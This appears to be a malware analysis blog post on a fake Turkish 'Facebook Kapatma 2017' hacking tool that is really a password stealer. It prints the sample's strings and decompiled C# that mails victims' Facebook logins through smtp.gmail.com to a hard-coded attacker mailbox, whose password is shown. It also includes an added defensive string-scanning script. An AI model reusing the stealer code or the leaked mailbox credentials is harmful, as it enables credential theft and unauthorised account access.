Last month security researchers discovered a Facebook password stealer bundled with njRAT. This month we came across another piece of malware that claims it can target a given profile and perform a DDoS attack, but which is in fact a password stealer aimed at Turkish users.
Static Analysis of the sample (code analysis)
MD5: F7BED7CD45A98275470707E54976C009
File Type: 32-bit EXE
Size: 845824 bytes
Figure 1 CompilerDetect -> .NET
The malware is compiled with .NET, so we started with string and code analysis of the sample. The strings already reveal some very interesting details:
· 0000000CCA0D 0000004CE60D 0 Account Close
· 0000000CCA29 0000004CE629 0 CheckBox3
· 0000000CCA63 0000004CE663 0 ProgressBar1
· 0000000CCA7D 0000004CE67D 0 Label4
· 0000000CCADF 0000004CE6DF 0 $this.BackgroundImage
· 0000000CCB0B 0000004CE70B 0 $this.Icon
· 0000000CCB21 0000004CE721 0 FACEBOOK
· 0000000CCB33 0000004CE733 0 FACEBOOK KAPATMA 2017
· 0000000CCB5F 0000004CE75F 0 Login Successful Account will be closed within 5 minutes.
· 0000000CCBD3 0000004CE7D3 0 furkanbabalog(at)gmail.com
· 0000000CCC03 0000004CE803 0 smtp.gmail.com
· 0000000CCC21 0000004CE821 0 sanane123
· 0000000CCC35 0000004CE835 0 Facebook_Kapatma_2017.Resources
· 0000000CDB66 0000004D2166 0 VS_VERSION_INFO
· 0000000CDBC2 0000004D21C2 0 VarFileInfo
· 0000000CDBE2 0000004D21E2 0 Translation
· 0000000CDC06 0000004D2206 0 StringFileInfo
· 0000000CDC2A 0000004D222A 0 000004b0
· 0000000CDC42 0000004D2242 0 FileDescription
· 0000000CDC64 0000004D2264 0 Facebook Kapatma 2017
· 0000000CDC96 0000004D2296 0 FileVersion
· 0000000CDCB0 0000004D22B0 0 1.0.0.0
· 0000000CDCC6 0000004D22C6 0 InternalName
· 0000000CDCE0 0000004D22E0 0 Facebook Kapatma 2017.exe
The file description, resource details and e-mail credentials (highlighted in red) are all present inside the sample. Using these credentials we tried to log in and stop the victim data collection, but Gmail blocked the attempt because the device was not recognised. It is probably a placeholder (drop) account set up by the attacker.
Figure 2 Gmail security asks for verification
The file resources contain a background image in the style of a hacker movie poster.
Figure 3 Background image
Figure 4 Facebook Kapatma
'Kapatma' is a Turkish word meaning 'close down'. The image above shows the classes found in the code. Inside the code we find the input fields, the checkboxes and the labels:
```csharp
// Control captions from the form's designer code (Turkish strings with translations)
this.Label1.Text = "E-posta";          // E-posta means e-mail
this.Label2.Text = "Şifre";            // Şifre means password
this.CheckBox1.Text = "Ddos Attack";
this.Button1.Text = "Hesabı Kapat";    // Hesabı Kapat means close account
this.Label3.Text = "URL:";
this.CheckBox3.Text = "Complaint Attack\r\n";
this.Label4.Text = "NOT:Hesap 5Dakika İçerisinde Kapatılır ! "; // Note: account closed within 5 minutes
```
The purpose is to collect the Facebook credentials entered into the tool; the URL field is supposedly the profile to be attacked. Let's see how the collected details are transferred.
```csharp
// Button handler from the form class; these namespaces are required for it to compile
using System;
using System.Net;
using System.Net.Mail;
using Microsoft.VisualBasic;

private void Button1_Click(object sender, EventArgs e)
{
    MailMessage mailMessage = new MailMessage();
    try
    {
        // Fake success message shown to the victim
        Interaction.MsgBox("Login Successful Account will be closed within 5 minutes.", MsgBoxStyle.OkOnly, null);
        // Sender and recipient are the same hard-coded Gmail mailbox
        mailMessage.From = new MailAddress("furkanbabalog(at)gmail.com");
        mailMessage.To.Add("furkanbabalog(at)gmail.com");
        mailMessage.Subject = this.TextBox1.Text; // victim's e-mail address from the form
        mailMessage.Body = this.TextBox2.Text;    // victim's password from the form
        new SmtpClient("smtp.gmail.com")
        {
            Port = 587,
            EnableSsl = true,
            Credentials = new NetworkCredential("furkanbabalog(at)gmail.com", "sanane123")
        }.Send(mailMessage);
    }
    catch (Exception)
    {
        // catch body not included in the decompiled extract; assumed empty
    }
}
```
The code snippet above shows that the collected credentials are sent by e-mail: the tool logs in to the hard-coded Gmail account and mails the details to that same account, i.e. the From and To addresses are the same mailbox.
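As an added example (not the post's code and not from the sample's author), the triage helper below applies the pattern just described from the defender's side: it extracts ASCII and UTF-16LE strings from a binary and flags the combination of an SMTP host, a mailbox and an adjacent password-like literal. The sample bytes, the mailbox and the password it scans are constructed placeholders, not taken from the real file.

```python
import re

# Added triage helper (not the post's code). It flags the pattern this sample
# shows: an SMTP host, a mailbox and a password-like literal sitting together
# in the string table of a .NET binary. Sample bytes below are constructed.

SMTP_HOST = re.compile(r"^smtp\.[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)
MAILBOX = re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$")
SECRET = re.compile(r"^[^\s\\/:]{6,32}$")  # token-like: no spaces, paths or URLs


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII and UTF-16LE strings in file order (.NET #US heap is UTF-16LE)."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append((m.start(), m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append((m.start(), m.group().decode("utf-16le")))
    return [s for _, s in sorted(found)]


def find_smtp_exfil(data: bytes) -> dict:
    """Return SMTP hosts, mailboxes, candidate secrets and a verdict."""
    strs = extract_strings(data)
    hosts = sorted({s for s in strs if SMTP_HOST.match(s)})
    mailboxes = sorted({s for s in strs if MAILBOX.match(s)})
    secrets = set()
    for cur, nxt in zip(strs, strs[1:]):
        # literals are usually emitted in source order, so the password tends
        # to sit right next to the mailbox or host it is used with
        if ((MAILBOX.match(cur) or SMTP_HOST.match(cur)) and SECRET.match(nxt)
                and not (MAILBOX.match(nxt) or SMTP_HOST.match(nxt))):
            secrets.add(nxt)
    return {"smtp_hosts": hosts, "mailboxes": mailboxes,
            "candidate_secrets": sorted(secrets),
            "suspicious": bool(hosts and mailboxes and secrets)}


def build_sample() -> bytes:
    """Constructed stand-in for the sample's string table (placeholder values)."""
    user_strings = ["Login Successful Account will be closed within 5 minutes.",
                    "attacker@example.com", "smtp.gmail.com", "hunter2pass",
                    "Facebook_Kapatma_2017.Resources"]
    heap = b"".join(b"\x01" + s.encode("utf-16le") + b"\x00\x00" for s in user_strings)
    return b"MZ\x90\x00" + b"\x00" * 16 + heap + b"VS_VERSION_INFO\x00FileVersion\x00"


if __name__ == "__main__":
    print(find_smtp_exfil(build_sample()))
```

The adjacency check is a heuristic for triage, not proof; a hit should be confirmed by decompiling the code that references the literals, as the post does.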
Behavioural analysis
Figure 5 GUI of the fake tool
We entered random text into the text boxes and selected all the check boxes. Once we clicked the button, a message box appeared saying the login was successful and the account would be closed within 5 minutes.
Figure 6 Login successful message box
No file or registry traces are left behind after the malware has executed.
Conclusion:
We are seeing an emerging trend of "Facebook hacking tools" and "DDoS tools" that actually steal the credentials of the tool's own user rather than attacking the given target. It is high time to educate users that these tools are fake: they are password stealers, not hacking or cracking tools. In this case the target is Turkish users, and we can expect similar tools to appear in other parts of the world.